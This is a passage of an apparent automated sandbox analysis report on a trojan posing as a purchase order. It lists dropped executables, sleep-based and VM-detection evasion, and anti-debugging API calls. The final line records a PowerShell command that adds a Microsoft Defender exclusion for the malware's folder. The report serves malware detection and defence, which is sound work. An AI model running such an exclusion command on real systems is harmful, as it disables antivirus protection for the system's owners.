                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeEvaded block: after key decisiongraph_0-101954
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                        Source: C:\Windows\System32\AppVClient.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeAPI coverage: 4.7 %
                        Source: C:\Windows\System32\alg.exe TID: 6520Thread sleep time: -90000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 4308Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3576Thread sleep count: 5777 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2676Thread sleep time: -3689348814741908s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3816Thread sleep count: 1850 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4220Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe TID: 6456Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 7436Thread sleep time: -79440000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 7436Thread sleep time: -60000s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00446CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00446CA9
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_004460DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_004460DD
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_004463F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_004463F9
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0044EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0044EB60
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0044F56F FindFirstFileW,FindClose,0_2_0044F56F
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0044F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0044F5FA
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00451B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00451B2F
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00451C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00451C8A
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00451F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00451F94
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0041DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0041DDC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeThread delayed: delay time: 60000
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeThread delayed: delay time: 60000
                        Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
                        Source: Grinnellia.exe, 00000016.00000002.2250241974.0000000000BE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW.Tz
                        Source: wscript.exe, 00000014.00000002.2192228931.000001C880DD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: Grinnellia.exe, 00000008.00000002.2099585917.0000000000D80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                        Source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073106501.0000000000C15000.00000004.00000020.00020000.00000000.sdmp, PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073106501.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2133063417.000000000060E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2149828169.000000000060E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2092069897.000000000060E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2124461247.000000000060E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2101091606.000000000060E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2705891976.000000000060E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2094460751.0000000000614000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2092069897.0000000000614000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: RegSvcs.exe, 0000000D.00000002.2135239863.0000000000D7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                        Source: wscript.exe, 00000014.00000002.2192228931.000001C880DD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\E
                        Source: Grinnellia.exe, 00000016.00000002.2249712826.0000000000B44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                        Source: Grinnellia.exe, 0000000B.00000002.2126725116.0000000000B02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWJ
                        Source: AppVClient.exe, 00000007.00000002.2070469675.0000000000584000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.2069766549.0000000000580000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appv:SoftwareClients/appv:JavaVirtualMachineT
                        Source: server01.exe, 0000000F.00000002.3325354337.00000000015E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeAPI call chain: ExitProcess graph end nodegraph_0-102372
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information queried: ProcessInformation
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00456AAF BlockInput,0_2_00456AAF
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00403D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403D19
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00433920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00433920
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,13_2_004019F0
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0041E01E LoadLibraryA,GetProcAddress,0_2_0041E01E
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AB1130 mov eax, dword ptr fs:[00000030h]0_2_00AB1130
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AF3F3D mov eax, dword ptr fs:[00000030h]0_2_00AF3F3D
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00C144A8 mov eax, dword ptr fs:[00000030h]0_2_00C144A8
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00C14508 mov eax, dword ptr fs:[00000030h]0_2_00C14508
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00C12E48 mov eax, dword ptr fs:[00000030h]0_2_00C12E48
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 8_2_00B4C538 mov eax, dword ptr fs:[00000030h]8_2_00B4C538
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 8_2_00B4AE78 mov eax, dword ptr fs:[00000030h]8_2_00B4AE78
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 8_2_00B4C4D8 mov eax, dword ptr fs:[00000030h]8_2_00B4C4D8
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 8_2_02B81130 mov eax, dword ptr fs:[00000030h]8_2_02B81130
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 8_2_02BC3F3D mov eax, dword ptr fs:[00000030h]8_2_02BC3F3D
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 11_2_009D1130 mov eax, dword ptr fs:[00000030h]11_2_009D1130
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 11_2_00A13F3D mov eax, dword ptr fs:[00000030h]11_2_00A13F3D
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 11_2_00D0DDC0 mov eax, dword ptr fs:[00000030h]11_2_00D0DDC0
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 11_2_00D0DD60 mov eax, dword ptr fs:[00000030h]11_2_00D0DD60
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 11_2_00D0C700 mov eax, dword ptr fs:[00000030h]11_2_00D0C700
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 22_2_00B52318 mov eax, dword ptr fs:[00000030h]22_2_00B52318
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 22_2_00B53978 mov eax, dword ptr fs:[00000030h]22_2_00B53978
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 22_2_00B539D8 mov eax, dword ptr fs:[00000030h]22_2_00B539D8
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 22_2_03001130 mov eax, dword ptr fs:[00000030h]22_2_03001130
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 22_2_03043F3D mov eax, dword ptr fs:[00000030h]22_2_03043F3D
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0043A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0043A66C
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess token adjusted: Debug
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00428189 SetUnhandledExceptionFilter,0_2_00428189
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_004281AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004281AC
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AF1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AF1361
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AF4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00AF4C7B
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 8_2_02BC1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_02BC1361
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 8_2_02BC4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_02BC4C7B
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 11_2_00A11361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00A11361
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 11_2_00A14C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00A14C7B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_0040CE09
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_0040E61C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00416F6A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_004123F1 SetUnhandledExceptionFilter,13_2_004123F1
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 22_2_03041361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_03041361
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 22_2_03044C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_03044C7B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
